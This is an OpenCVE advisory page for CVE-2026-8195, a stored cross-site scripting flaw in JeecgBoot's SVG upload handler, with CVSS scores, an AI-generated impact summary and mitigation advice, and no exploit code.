Description
A vulnerability was detected in JeecgBoot up to 3.9.1. The affected element is an unknown function of the file jeecg-module-system/jeecg-system-biz/src/main/java/org/jeecg/modules/system/controller/CommonController.java of the component SVG File Handler. The manipulation results in cross site scripting. The attack can be executed remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
Published: 2026-05-09
Score: 5.3 Medium
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

A stored cross‑site scripting flaw exists in JeecgBoot’s SVG file handler. The vulnerability resides in an unspecified function within CommonController.java and is triggered by uploading or manipulating SVG files. An attacker who can supply a crafted SVG can inject malicious JavaScript that will execute in the browser of any user who subsequently opens the polluted file. The injected code may steal session tokens, deface the interface, or redirect to malicious sites.

Affected Systems

JeecgBoot, version 3.9.1 or earlier, specifically the component located at jeecg-module-system/jeecg-system-biz/src/main/java/org/jeecg/modules/system/controller/CommonController.java. No other versions are noted as affected, and the vendor has not released a fix for the disclosed flaw.

Risk and Exploitability

The CVSS score of 5.3 indicates a moderate impact. EPSS data is not available, and the vulnerability is not currently listed in the CISA KEV catalog. Because the exploit can be performed over the network without requiring privileged local access, the risk of successful compromise remains moderate, especially if the system is reachable from untrusted environments. No media or social engineering prerequisites are mentioned; thus an attacker can directly target the exposed SVG handling routine.

Generated by OpenCVE AI on May 9, 2026 at 21:20 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Restrict uploads to SVG files that match approved MIME types and enforce strict size limits.
  • Validate or sanitize all SVG content to remove script elements, style tags, and event handlers before rendering.
  • Add a robust Content Security Policy that blocks inline scripts and limits execution of embedded SVG resources.
  • Monitor web logs for abnormal SVG upload patterns and user interactions with SVG content.
  • Apply a vendor‑provided patch or newer version of JeecgBoot as soon as it becomes available.

Generated by OpenCVE AI on May 9, 2026 at 21:20 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Sat, 09 May 2026 20:15:00 +0000

Type Values Removed Values Added
Description A vulnerability was detected in JeecgBoot up to 3.9.1. The affected element is an unknown function of the file jeecg-module-system/jeecg-system-biz/src/main/java/org/jeecg/modules/system/controller/CommonController.java of the component SVG File Handler. The manipulation results in cross site scripting. The attack can be executed remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
Title JeecgBoot SVG File CommonController.java cross site scripting
Weaknesses CWE-79
CWE-94
References
Metrics cvssV2_0

{'score': 5, 'vector': 'AV:N/AC:L/Au:N/C:N/I:P/A:N/E:POC/RL:ND/RC:UR'}

cvssV3_0

{'score': 4.3, 'vector': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R'}

cvssV3_1

{'score': 4.3, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R'}

cvssV4_0

{'score': 5.3, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P'}

Subscriptions

No data.

cve-icon MITRE

Status: PUBLISHED

Assigner: VulDB

Published:

Updated: 2026-05-09T20:00:11.428Z

Reserved: 2026-05-08T20:14:18.538Z

Link: CVE-2026-8195

cve-icon Vulnrichment

No data.

cve-icon NVD

Status : Received

Published: 2026-05-09T20:16:30.517

Modified: 2026-05-09T20:16:30.517

Link: CVE-2026-8195

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-05-09T21:30:42Z

Weaknesses